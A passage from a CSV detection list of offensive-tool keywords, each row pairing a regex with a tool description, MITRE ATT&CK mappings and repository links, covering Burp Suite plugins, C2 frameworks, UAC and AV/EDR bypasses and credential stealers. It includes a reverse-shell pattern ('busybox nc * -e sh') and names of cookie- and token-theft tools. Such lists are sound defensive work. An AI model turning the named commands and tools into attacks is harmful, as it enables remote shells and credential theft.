Tools","https://portswigger.net/burp","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*burp*PayloadParser.py*",".{0,1000}burp.{0,1000}PayloadParser\.py.{0,1000}","offensive_tool_keyword","burpsuite","PayloadParser - Burp Suite NMap Parsing Interface in Python","T1583 - T1595 - T1190","TA0001 - TA0003 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/infodel/burp.extension-payloadparser","1","1","N/A","N/A","1","4","4","2013-03-15T20:41:45Z","2013-03-15T20:39:23Z" "*burp*SQLMapper.xml*",".{0,1000}burp.{0,1000}SQLMapper\.xml.{0,1000}","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","150","39","2024-02-21T02:23:00Z","2015-04-19T03:38:34Z" "*burp.extension-payloadparser*",".{0,1000}burp\.extension\-payloadparser.{0,1000}","offensive_tool_keyword","burpsuite","PayloadParser - Burp Suite NMap Parsing Interface in Python","T1583 - T1595 - T1190","TA0001 - TA0003 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/infodel/burp.extension-payloadparser","1","1","N/A","N/A","1","4","4","2013-03-15T20:41:45Z","2013-03-15T20:39:23Z" "*burp_log_*.log*",".{0,1000}burp_log_.{0,1000}\.log.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*Burp_start.bat*",".{0,1000}Burp_start\.bat.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*Burp_start_en.bat*",".{0,1000}Burp_start_en\.bat.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*burp2malleable.*",".{0,1000}burp2malleable\..{0,1000}","offensive_tool_keyword","cobaltstrike","Quick python utility I wrote to turn HTTP requests from burp suite into Cobalt Strike Malleable C2 profiles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CodeXTF2/Burp2Malleable","1","1","N/A","10","10","339","32","2023-04-06T15:24:12Z","2022-08-14T18:05:39Z" "*burp-co2/out/artifacts*",".{0,1000}burp\-co2\/out\/artifacts.{0,1000}","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","150","39","2024-02-21T02:23:00Z","2015-04-19T03:38:34Z" "*BurpCO2Suite.xml*",".{0,1000}BurpCO2Suite\.xml.{0,1000}","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","150","39","2024-02-21T02:23:00Z","2015-04-19T03:38:34Z" "*burpcollaborator.net*",".{0,1000}burpcollaborator\.net.{0,1000}","offensive_tool_keyword","burpsuite","Burp Suite is a leading range of cybersecurity tools. brought to you by PortSwigger. We believe in giving our users a competitive advantage through superior research. This tool is not free and open source","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*BurpFunctions.java*",".{0,1000}BurpFunctions\.java.{0,1000}","offensive_tool_keyword","burpsuite","A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/nccgroup/BurpSuiteHTTPSmuggler","1","1","N/A","N/A","7","683","110","2019-05-04T06:15:42Z","2018-07-03T07:47:58Z" "*burpitem.py*",".{0,1000}burpitem\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*burplog.py*",".{0,1000}burplog\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*BurpShiroPassiveScan.jar*",".{0,1000}BurpShiroPassiveScan\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*burpstate.py*",".{0,1000}burpstate\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*Burpsuite*",".{0,1000}Burpsuite.{0,1000}","offensive_tool_keyword","burpsuite","Burp Suite is a leading range of cybersecurity tools. brought to you by PortSwigger. We believe in giving our users a competitive advantage through superior research. This tool is not free and open source","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*burpsuite*.exe*",".{0,1000}burpsuite.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation Tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*burpsuite*.jar*",".{0,1000}burpsuite.{0,1000}\.jar.{0,1000}","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation Tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*burpsuite*.sh*",".{0,1000}burpsuite.{0,1000}\.sh.{0,1000}","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation Tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*burpsuite*.zip*",".{0,1000}burpsuite.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation Tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*BurpSuiteCn.jar*",".{0,1000}BurpSuiteCn\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*BurpSuiteHTTPSmuggler*",".{0,1000}BurpSuiteHTTPSmuggler.{0,1000}","offensive_tool_keyword","burpsuite","A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/nccgroup/BurpSuiteHTTPSmuggler","1","1","N/A","N/A","7","683","110","2019-05-04T06:15:42Z","2018-07-03T07:47:58Z" "*BurpSuite-SecretFinder*",".{0,1000}BurpSuite\-SecretFinder.{0,1000}","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","10","1749","335","2024-03-17T17:15:56Z","2020-06-08T10:50:12Z" "*burp-vulners-scanner-*.jar*",".{0,1000}burp\-vulners\-scanner\-.{0,1000}\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*burp-xss-sql-plugin*",".{0,1000}burp\-xss\-sql\-plugin.{0,1000}","offensive_tool_keyword","burpsuite","find several bugbounty-worthy XSSes. OpenRedirects and SQLi.","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0008 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/attackercan/burp-xss-sql-plugin","1","1","N/A","N/A","1","45","12","2016-09-28T21:46:18Z","2016-08-17T14:05:24Z" "*buster -e * -f john -l doe -b '****1989'*",".{0,1000}buster\s\-e\s.{0,1000}\s\-f\sjohn\s\-l\sdoe\s\-b\s\'.{0,1000}.{0,1000}.{0,1000}.{0,1000}1989\'.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*busterPayloads.txt*",".{0,1000}busterPayloads\.txt.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*busybox nc * -e sh*",".{0,1000}busybox\snc\s.{0,1000}\s\-e\ssh.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*bWV0YXNwbG9pdA==*",".{0,1000}bWV0YXNwbG9pdA\=\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*byakugan/bin/*",".{0,1000}byakugan\/bin\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Bye_Explorer.ino*",".{0,1000}Bye_Explorer\.ino.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","137","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" "*byinarie/teams_dump*",".{0,1000}byinarie\/teams_dump.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1555 - T1003 - T1114","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","1","N/A","9","2","121","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z" "*byinarie/teams_dump*",".{0,1000}byinarie\/teams_dump.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1560.001 - T1555.003 - T1113 - T1557","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","1","N/A","7","2","121","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z" "*BYOVD_kill_av_edr.*",".{0,1000}BYOVD_kill_av_edr\..{0,1000}","offensive_tool_keyword","BYOVD_kill_av_edr","BYOD to kill AV/EDR","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/red-team-scripts/blob/main/BYOVD_kill_av_edr.c","1","1","N/A","10","3","245","46","2023-06-14T02:13:19Z","2023-01-15T22:37:34Z" "*Bypass Success! Now impersonating the forged token* Loopback network auth should be seen as elevated now*",".{0,1000}Bypass\sSuccess!\sNow\simpersonating\sthe\sforged\stoken.{0,1000}\sLoopback\snetwork\sauth\sshould\sbe\sseen\sas\selevated\snow.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","10","4","322","47","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" "*bypass_cmdinject*",".{0,1000}bypass_cmdinject.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*bypass_powershell_protections*",".{0,1000}bypass_powershell_protections.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Bypass-4MSI*",".{0,1000}Bypass\-4MSI.{0,1000}","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","4167","582","2024-04-29T07:48:05Z","2019-05-28T10:53:00Z" "*bypass-amsi*",".{0,1000}bypass\-amsi.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*BypassAV.exe*",".{0,1000}BypassAV\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike plugin for quickly generating anti-kill executable files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/hack2fun/BypassAV","1","1","N/A","10","10","871","124","2020-07-19T15:46:54Z","2020-02-17T02:33:14Z" "*bypassBetterDiscord(*",".{0,1000}bypassBetterDiscord\(.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*bypass-classic.dll*",".{0,1000}bypass\-classic\.dll.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*BypassCredGuard/zipball*",".{0,1000}BypassCredGuard\/zipball.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","1","N/A","10","3","293","47","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" "*BypassCredGuard-master*",".{0,1000}BypassCredGuard\-master.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","1","N/A","10","3","293","47","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" "*BYPASS-DINVOKE*.dll*",".{0,1000}BYPASS\-DINVOKE.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*BYPASS-DINVOKE.dll*",".{0,1000}BYPASS\-DINVOKE\.dll.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*BYPASS-DINVOKE_MANUAL_MAPPING.dll*",".{0,1000}BYPASS\-DINVOKE_MANUAL_MAPPING\.dll.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*bypass-pipe.c*",".{0,1000}bypass\-pipe\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bypass-powershell.ps1*",".{0,1000}bypass\-powershell\.ps1.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*BypassUAC *.exe*",".{0,1000}BypassUAC\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*bypassuac fodhelper*",".{0,1000}bypassuac\sfodhelper.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*Bypass-UAC*",".{0,1000}Bypass\-UAC.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*bypassUAC*.boo*",".{0,1000}bypassUAC.{0,1000}\.boo.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI 